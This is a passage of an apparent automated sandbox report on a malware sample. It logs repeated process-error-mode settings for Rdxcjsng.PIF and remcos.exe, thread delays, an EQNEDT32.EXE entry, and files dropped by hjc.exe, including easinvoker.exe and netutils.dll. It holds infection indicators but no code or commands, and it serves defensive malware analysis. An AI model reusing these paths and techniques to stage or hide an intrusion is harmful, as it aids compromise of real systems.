                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: threadDelayed 1880Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: threadDelayed 6828Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: threadDelayed 559Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: foregroundWindowGot 1693Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeDropped PE file which has not been started: C:\Users\Public\Libraries\netutils.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeAPI coverage: 9.4 %
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3284Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3692Thread sleep time: -5640000s >= -30000sJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3688Thread sleep time: -126000s >= -30000sJump to behavior
